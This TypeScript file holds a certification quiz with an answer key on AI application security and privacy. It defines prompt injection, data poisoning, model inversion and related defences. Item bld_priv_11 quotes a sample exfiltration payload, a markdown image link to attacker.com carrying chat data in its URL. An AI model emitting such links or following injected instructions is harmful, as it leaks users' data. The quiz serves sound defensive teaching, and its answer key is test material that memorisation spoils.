import { CertQuestion } from '../types';

export const BUILDER_PRIVACY_QUESTIONS: CertQuestion[] = [
  {
    id: 'bld_priv_01',
    section: 'privacy',
    prompt: 'What is a "Prompt Injection" attack (direct vs indirect)?',
    options: [
      { id: 'a', label: 'Direct: user input overrides system instructions; Indirect: untrusted third-party data (webpage, email) contains malicious instructions executed by the LLM.' },
      { id: 'b', label: 'Direct: executing SQL injection in database fields; Indirect: physical malware on a USB drive.' },
      { id: 'c', label: 'Direct: hardware memory overflow; Indirect: high network latency.' },
      { id: 'd', label: 'Direct: compiling invalid C++ code; Indirect: typing in lowercase.' },
    ],
    correctOptionId: 'a',
  },
  {
    id: 'bld_priv_02',
    section: 'privacy',
    prompt: 'How can a builder mitigate indirect prompt injection when an agent reads incoming user emails or web pages?',
    options: [
      { id: 'a', label: 'Execute any shell commands found in email text with elevated root privileges.' },
      { id: 'b', label: 'Treat all incoming external text as verified system-level commands.' },
      { id: 'c', label: 'Isolate untrusted data within strict XML tags (e.g. <untrusted_data>), instruct model to treat content solely as passive text, and restrict agent tool privileges.' },
      { id: 'd', label: 'Permanently disable all agent tools upon reading a single email.' },
    ],
    correctOptionId: 'c',
  },
  {
    id: 'bld_priv_03',
    section: 'privacy',
    prompt: 'When building a RAG system over proprietary enterprise documents, how is "access control / ACL enforcement" properly implemented?',
    options: [
      { id: 'a', label: 'Store database credentials in plaintext inside the client system prompt.' },
      { id: 'b', label: 'Provide all authenticated users with global read access to the full vector index.' },
      { id: 'c', label: 'Rely on LLM conversational memory to decide who is authorized to view confidential documents.' },
      { id: 'd', label: 'Filter vector search queries with tenant and user permission metadata so the model only retrieves documents the active user is authorized to read.' },
    ],
    correctOptionId: 'd',
  },
  {
    id: 'bld_priv_04',
    section: 'privacy',
    prompt: 'What is "Data Poisoning" in the context of custom RAG knowledge bases or fine-tuning datasets?',
    options: [
      { id: 'a', label: 'Accidentally deleting empty markdown files from repository folders.' },
      { id: 'b', label: 'An adversary injects subtly corrupted, biased, or backdoor-laden documents into the retrieval corpus to manipulate future model outputs.' },
      { id: 'c', label: 'Upgrading database server software to the latest stable release.' },
      { id: 'd', label: 'Hardware server cooling system leaks.' },
    ],
    correctOptionId: 'b',
  },
  {
    id: 'bld_priv_05',
    section: 'privacy',
    prompt: 'Why must API keys for AI providers NEVER be embedded in client-side mobile or frontend browser code?',
    options: [
      { id: 'a', label: 'Anyone can inspect client bundles, extract the secret key, drain API balances, and access unauthorized company endpoints.' },
      { id: 'b', label: 'Frontend browser JavaScript cannot send HTTPS network requests.' },
      { id: 'c', label: 'Client-side API keys automatically expire after 10 milliseconds.' },
      { id: 'd', label: 'Frontend web frameworks do not support string authentication headers.' },
    ],
    correctOptionId: 'a',
  },
  {
    id: 'bld_priv_06',
    section: 'privacy',
    prompt: 'What is the "Principle of Least Privilege" applied to AI tool / function calling capabilities?',
    options: [
      { id: 'a', label: 'Granting the agent unrestricted root administrator privileges on production databases.' },
      { id: 'b', label: 'Allowing the agent to execute arbitrary Bash shell scripts without argument validation.' },
      { id: 'c', label: 'Prohibiting the agent from returning any responses to the user.' },
      { id: 'd', label: 'Only grant the agent access to the minimal set of specific API tools, read-only permissions, and restricted scopes required for its task.' },
    ],
    correctOptionId: 'd',
  },
  {
    id: 'bld_priv_07',
    section: 'privacy',
    prompt: 'How should sensitive personally identifiable information (PII) logs be handled in production AI observability platforms?',
    options: [
      { id: 'a', label: 'Stream unmasked prompt payloads to publicly accessible logging dashboards.' },
      { id: 'b', label: 'Scrub and mask PII fields before persisting traces/logs, enforce strict retention TTLs, and restrict log access via RBAC.' },
      { id: 'c', label: 'Persist raw prompts on unencrypted public object storage buckets indefinitely.' },
      { id: 'd', label: 'Disable observability completely and log zero application errors.' },
    ],
    correctOptionId: 'b',
  },
  {
    id: 'bld_priv_08',
    section: 'privacy',
    prompt: 'What is "membership inference attack" in machine learning?',
    options: [
      { id: 'a', label: 'A brute-force guessing attack against account login passwords.' },
      { id: 'b', label: 'An unauthorized user subscribing to a paid SaaS tier without valid payment.' },
      { id: 'c', label: 'An attacker queries a model to determine whether a specific individual\'s private data was part of the model\'s training dataset.' },
      { id: 'd', label: 'Adding unauthorized bot accounts to internal communication channels.' },
    ],
    correctOptionId: 'c',
  },
  {
    id: 'bld_priv_09',
    section: 'privacy',
    prompt: 'When building AI features in healthcare applications, which compliance framework is mandatory in the United States?',
    options: [
      { id: 'a', label: 'HIPAA (with signed Business Associate Agreements ensuring encrypted, non-retained Protected Health Information handling).' },
      { id: 'b', label: 'DMCA (Digital Millennium Copyright Act).' },
      { id: 'c', label: 'PCI-DSS (Payment Card Industry Data Security Standard).' },
      { id: 'd', label: 'OSHA Workplace Safety Standards.' },
    ],
    correctOptionId: 'a',
  },
  {
    id: 'bld_priv_10',
    section: 'privacy',
    prompt: 'What is the ethical responsibility of an engineer building automated decision-making pipelines that affect human livelihoods (e.g. credit, jobs)?',
    options: [
      { id: 'a', label: 'Maximize execution speed regardless of disparate impact or demographic bias.' },
      { id: 'b', label: 'Hide all scoring logic from regulatory compliance auditors.' },
      { id: 'c', label: 'Erase all decision logs immediately following automated scoring.' },
      { id: 'd', label: 'Ensure explainability, auditable decision logs, bias testing across demographic subgroups, and appeal mechanisms with human review.' },
    ],
    correctOptionId: 'd',
  },
  {
    id: 'bld_priv_11',
    section: 'privacy',
    prompt: 'What is "Data Exfiltration via Markdown Injection" in LLM web interfaces, and how is it prevented?',
    options: [
      { id: 'a', label: 'Deleting images from server storage.' },
      { id: 'b', label: 'An attacker tricks the model into generating an image rendering tag `![click](https://attacker.com/steal?data=...)` containing sensitive chat context in URL parameters; prevented by Content Security Policy (CSP) image-src allowlists and stripping unverified image markdown.' },
      { id: 'c', label: 'Formatting tables using ASCII pipe characters.' },
      { id: 'd', label: 'Saving text files as .md instead of .txt.' },
    ],
    correctOptionId: 'b',
  },
  {
    id: 'bld_priv_12',
    section: 'privacy',
    prompt: 'In a sandboxed code execution environment for AI coding agents, what container security controls are mandatory?',
    options: [
      { id: 'a', label: 'Giving the container full host network access and mounting the host root filesystem.' },
      { id: 'b', label: 'Running the container as root with disabled seccomp profiles.' },
      { id: 'c', label: 'Ephemeral disposable containerization (e.g. gVisor, Firecracker), network egress blocking, read-only root filesystems, and strict CPU/memory/execution-time limits.' },
      { id: 'd', label: 'Running code directly in the host operating system kernel.' },
    ],
    correctOptionId: 'c',
  },
  {
    id: 'bld_priv_13',
    section: 'privacy',
    prompt: 'What is "Model Inversion" (or Reconstruction Attack) in privacy-preserving machine learning?',
    options: [
      { id: 'a', label: 'Flipping the order of layers in a convolutional neural network.' },
      { id: 'b', label: 'Switching between dark mode and light mode interfaces.' },
      { id: 'c', label: 'Rotating images 180 degrees before processing.' },
      { id: 'd', label: 'An attack where an adversary uses model output probabilities or gradient vectors to mathematically reconstruct sensitive private input features (e.g., facial images or clinical records) used in training.' },
    ],
    correctOptionId: 'd',
  },
  {
    id: 'bld_priv_14',
    section: 'privacy',
    prompt: 'When building a Customer Support AI agent that connects to a payment refund tool, what security pattern protects against unauthorized refunds?',
    options: [
      { id: 'a', label: 'Two-man rule / Human authorization gate: Agent can draft the refund payload and verify policy eligibility, but execution requires a verified human CSR manager token.' },
      { id: 'b', label: 'Allowing the AI agent to issue refunds up to $1,000,000 automatically without logs.' },
      { id: 'c', label: 'Deleting the customer database after every refund.' },
      { id: 'd', label: 'Disabling customer authentication before initiating refunds.' },
    ],
    correctOptionId: 'a',
  },
  {
    id: 'bld_priv_15',
    section: 'privacy',
    prompt: 'Why is "Differential Privacy" (DP-SGD) used when training models on sensitive personal records?',
    options: [
      { id: 'a', label: 'To make model training 100x faster.' },
      { id: 'b', label: 'It injects calibrated mathematical noise during gradient descent, providing provable mathematical guarantees that individual data records cannot be reconstructed or memorized.' },
      { id: 'c', label: 'To reduce GPU power consumption by 50%.' },
      { id: 'd', label: 'To eliminate all model parameter weights.' },
    ],
    correctOptionId: 'b',
  },
  {
    id: 'bld_priv_16',
    section: 'privacy',
    prompt: 'What constitutes a "Denial of Wallet" (DoW) attack against LLM applications?',
    options: [
      { id: 'a', label: 'Stealing a user\'s physical credit card.' },
      { id: 'b', label: 'Cracking a cryptocurrency wallet private key.' },
      { id: 'c', label: 'An adversary sending high-concurrency requests with maximal prompt token sizes to intentionally exhaust the application owner\'s cloud API budget and trigger massive financial charges.' },
      { id: 'd', label: 'Refusing to purchase software licenses.' },
    ],
    correctOptionId: 'c',
  },
  {
    id: 'bld_priv_17',
    section: 'privacy',
    prompt: 'Under SOC 2 Type II compliance, what audit evidence must an enterprise AI platform maintain for automated model inference?',
    options: [
      { id: 'a', label: 'Copies of developer personal chat histories.' },
      { id: 'b', label: 'Video recordings of every employee during work hours.' },
      { id: 'c', label: 'A list of favorite songs played in the office.' },
      { id: 'd', label: 'Immutable audit trails capturing timestamps, tenant IDs, model versions, access authorization checks, encryption status, and administrative permission changes.' },
    ],
    correctOptionId: 'd',
  },
  {
    id: 'bld_priv_18',
    section: 'privacy',
    prompt: 'What is "Dual-LLM Security Pattern" (Privileged vs Quarantined Execution)?',
    options: [
      { id: 'a', label: 'A low-privilege Quarantined LLM processes untrusted raw user/web inputs and outputs sanitised data; a high-privilege LLM with tool access acts only on the verified sanitized schema.' },
      { id: 'b', label: 'Running two identical models on two separate laptops.' },
      { id: 'c', label: 'Using one model for English and one model for Spanish.' },
      { id: 'd', label: 'Switching between CPU and GPU hardware.' },
    ],
    correctOptionId: 'a',
  },
  {
    id: 'bld_priv_19',
    section: 'privacy',
    prompt: 'How should an organization safeguard proprietary trade secrets when employees use internal RAG copilots?',
    options: [
      { id: 'a', label: 'Store all secret patents in public GitHub repositories.' },
      { id: 'b', label: 'Implement role-based document access filtering (RBAC) in vector search, redact top-secret codenames at query time, and maintain air-gapped VPC model endpoints.' },
      { id: 'c', label: 'Allow all contractors to query executive compensation files freely.' },
      { id: 'd', label: 'Disable vector database encryption.' },
    ],
    correctOptionId: 'b',
  },
  {
    id: 'bld_priv_20',
    section: 'privacy',
    prompt: 'When deploying a synthetic voice or face cloning tool, what ethical safeguard is critical to prevent deepfake fraud?',
    options: [
      { id: 'a', label: 'Allowing anonymous users to clone any public figure\'s voice without consent.' },
      { id: 'b', label: 'Deleting audio recordings after 1 millisecond.' },
      { id: 'c', label: 'Mandatory cryptographic provenance watermarking (e.g. C2PA), explicit biometric consent verification, and real-time liveness detection.' },
      { id: 'd', label: 'Restricting synthetic audio to monotone robotic voices.' },
    ],
    correctOptionId: 'c',
  },
];

